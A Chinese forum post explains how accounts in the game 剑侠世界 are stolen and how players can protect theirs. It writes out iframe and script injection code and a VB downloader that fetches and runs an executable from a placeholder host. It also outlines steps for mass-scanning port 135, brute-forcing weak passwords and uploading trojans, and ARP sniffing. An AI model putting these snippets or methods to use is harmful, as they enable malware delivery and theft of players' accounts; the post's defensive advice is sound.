谈剑侠世界中的盗号事件

　　大家好，最近很多玩家都在丢号，今天我给大家系统的讲一下号是如何被盗，应该如何防范，建议有点黑客基础知识的朋友看！

　　经常可以在世界频道看见骂盗号者的，请你们看完这篇文章以后就不要在做那么低级的事了，因为在我看来，自己的号被盗了，那是奇耻大辱，我可没脸去大喊大叫！也有朋友一被盗号就骂金山，说句公道话，金山公司的杀毒软件确实不行，任何被杀的小马拿到我手上都能轻松的过金山和瑞星的杀毒软件，目前也就卡巴有些难度，现在大家的电脑配置应该都不低了吧，建议大家安装卡巴斯基（外号：卡死你，内存在512以下的朋友就别安装了，真能卡死你）装上卡巴斯基，在配合360安全卫士的“清理恶评插件”功能，平时在注意一下基本安全（下面给大家讲），这样你的号能保证在95%不丢！

　　目前市场上流行的木马一般是：伯乐 大小姐 悍马 这几个工作室的马，大小姐工作室主要开发梦幻西游的马，悍马主要垄断魔兽，伯乐是什么马都在搞，这几个写马工作室都是比较有信誉的，而且木马随游戏更新而更新，价格也都差不多2000-4000，很多盗号工作室都用他们的马！

　　上面说了网络里流传的木马名字，下面我们在来说一下盗号者是如何利用他们提供的利刃来进行盗号的！（由于很多朋友没有这方面的知识，我就讲得通俗一些，内行朋友就别BB了）接着说，有了木马是远远不够的，还需要网马的配合，木马才能发挥最大效率来进行盗号，现在市场上的网马都是组合的，目前比较出名的是 终结者和暗黑 的网马，简单给大家讲一下网马是通过什么来执行的，网马一般是根据系统漏洞和第3方软件执行漏洞来让木马隐藏下载并且运行，这样就达到了种马的效果，这时候就有朋友要问了，到底有那些漏洞，我们该如何防范呢？别急，我会告诉你们的！大家还记得去年的06014漏洞吧，呵呵`非常经典的系统漏洞，一天可以抓上万只鸽子鸡，但是现在比较少了，通过中马率文件的显示，最多的还是第3方软件的中率要高些，一般是RealPlay播放器 Qvod Player（Q播） 迅雷下载器 另外07004也还行`知道了这些软件有漏洞以后该怎么办，就不需要我说了吧，当然是卸在低版本的，然后安装最新版的嘛`笨笨，所以最基本的安全操作是：打好系统所有的补丁，在卸掉一些不常用的第3方软件，如果要用的请一定安装最新版！

　　做好上面的事情后，我们在来了解一下盗号工作室是怎么利用木马和网马来盗你的号，一般是通过挂马的方式，有些内行朋友看到这该骂我了，直接说挂站不就行了，还那么多废话，错！为了大家对这方面的知识有更高一层次的认识，所以我要讲的不止是同过挂站来盗号，大家请仔细看清楚了！

　　第一种方式：通过入侵网站，挂马者可以通过网站后门完全控制别人的整个网站，既然是完全控制，那么就有了写入权限，就可以编辑别人网站的源代码，用处是什么呢！挂弹窗广告，挂远程控制木马，挂盗号木马，挂插件，这些都是可以赚钱的，常用代码如下：

　　一：框架挂马<IFRAME src=“http://www.xxx.com/mm.htm（这里是上面说到的网马地址）” width=0 height=0></IFRAME>二：js文件挂马

　　<SCRIPT language=javascript src=“vip.js”></SCRIPT> vip.js里的内容和上面的框架的代码雷同三：body挂马

　　这里只说3种，当然挂马的代码肯定不止这些，但是90%的人挂马都只用这3种，如果你遇到另外那10%，只能说明你命不好，人品太差

　　挂马者一般为了节约时间，通常会在网站的最上或者最下写上这些代码，所以当你发现电脑突然卡起来了，或者CPU突然100%，并且进程多了一些CMD.EXE mm.exe muma.exe类的进程，那么你就得马上关闭游戏，断开网线，然后杀毒，为什么要断开网线呢，因为刚中马，谁也不知道对方挂的是什么马，万一是灰鸽子类的远程控制软件呢，那你杀1万次也没用！所以断开网络是必须的！

　　第二种方式：通过入侵服务器，然后用服务器的arp功能来进行整个IP段的嗅探和欺诈，入侵服务器的方法就太多了`举些常用的例子吧！1433 3372 42 135 等端口的溢出可以直接得到服务器的CMD权限，有了这个权限你就可以建立帐号，开3389，然后上去乱整了`呵呵！也可以通过网站后门来进行提权，一般都是用SU或者SQL的SA或者ROOT来进行提权，现在有朋友要问了，在别人服务器上挂木马，关我什么事，我又不去他服务器上的网站，错！这样想是不对的！比如服务器的IP是212.125.1.100，那么这个IP段之间就有255个服务器212.125.1.1-212.125.1.255，如果这255个服务器都在同一个交换机上，并且没有很好的arp防火墙，那么入侵其中一个服务器就等于入侵了整个IP段的服务器了，目前最好用的嗅探工具是scan，有汉化版！

　　第三种方式：通过网吧局域网共享来传播木马，这方法不需要用到网马！直接可以种EXE程序，在网吧上网丢号的朋友看仔细了，由于一些菜鸟网管到现在还在使用文件共享而没有使用印象文件的猪脑壳导致很多朋友在网吧丢号，盗号者一般会使用阿D网络工具包类的黑客软件来进行共享开启和传输，就这样不知不觉的你就中马了````汗`真可怜！

　　第四种方式：135溢出，当然也可以是137 138 139 445，这端口不重要，随便扫都行，重要的是这些端口一般是家用电脑默认开启的端口，只要扫出来存活主机就行`因为135溢出主要针对的是administrator用户名的密码为弱口令，什么是弱口令呢？比如什么123456 654321 888888 000000这类的傻瓜密码就为弱口令了，当然也包括自动登陆，不设置密码的用户，由于现在国内用户大多网络安全意识比较差，60%以上的人是不去设置密码和改变用户组的，鉴于很多朋友是在家上网并且丢号的，这里我就讲详细一点，135溢出的操作流程是：1大批量扫描135端口，2过滤弱口令，3批量开启弱口令的23端口，4批量上传并且运行木马，这样看就应该从什么地方来做自己的安全了吧？首先更改登陆密码，然后关闭23端口，23端口可以直接在服务器里禁用，当然你也可以彻底删除telnet的组建，反正你又不用这东西`

　　顺便说一下一些黑客技术初学者的常用伎俩，因为他们没那技术如入侵，所以只有搞写下三滥的招数，反正这些招数我是看不上眼的，但是这些招数一样有人去中啊，我就郁闷了，为什么你们会那么笨，喜欢看毛片的朋友注意了！！现在很多A站被封，大家只能通过一些共享软件来满足你们的兽欲，比如什么PP点点通 驴子 BT 类的软件平台来实现用户之间的相互传输，很多小菜鸟喜欢找一个小一点的影片，比如3M 4M的，名字取骚一点就有人去下载了`而且下载的人还不少呢``哎`，虽然这些共享平台可以过滤捆绑，但是过滤不了插代码的，比如RM格式的影片可以插入时间来定时弹窗，看到最精彩的时候弹个网页出来`我想你是没空去管的`如果弹出来的这个网页是挂的网马，那你就中了，WMV类的格式可以插入证书，一打开文件，就提示你要下载证书才能观看，要你忍不住要看`一点下载，那么马上也是弹一个网页出来，哎`````真郁闷，看片都要我教！！！！

　　爱到处下载外挂的朋友看仔细了！现在大部分的外挂都是VB或者delhpi类编程环境画出来的假外挂，其实里面的代码很简单，就是一个下载者的代码，自动下载指定的EXE程序，并且运行！

　　来看一下VB的代码：Private Sub Form_Load（）

　　URLDownloadToFile 0， “http://www.xxx.com/jx.exe（木马地址！）”， “C：\jx.exe”， 0， 0 Sleep 5000 '单位是毫秒，下载完毕后的5000毫秒自动运行ShellExecute 0， vbNullString， “C：\jx.exe”， vbNullString， vbNullString， vbNormalFocus End End Sub看见了么，就是那么简单，这是很简单的，如果在多加一些隐藏功能，你是发现不了的，所以大家老实的玩游戏吧，别JB乱整了，吃亏的是自己！

　　在说一下在新手村每天喊话不累的哪个垃圾是如何盗号的，他利用的是QQ空间自定义模块的功能开实现挂马，有些自认为很会搞空间的朋友这时候会鄙视我了`QQ空间是不能插HTM的页面的`呵呵，是不能，但是能插图片啊`，首先找一个免费的IIS空间，上传一个图片木马，图片木马的内容为：GIF89a

　　<STYLE type=text/css>textarea，input，body，select，pre，td，th{font-family： “宋体”；font-size： 9pt}.button {border-width： 1px} .text {border：solid 1px}</STYLE>

　　下面就是HTM的代码了，太长，不写了这样就可以实现用GIF格式的图片来执行网页的脚本了！！！！大家记住了！！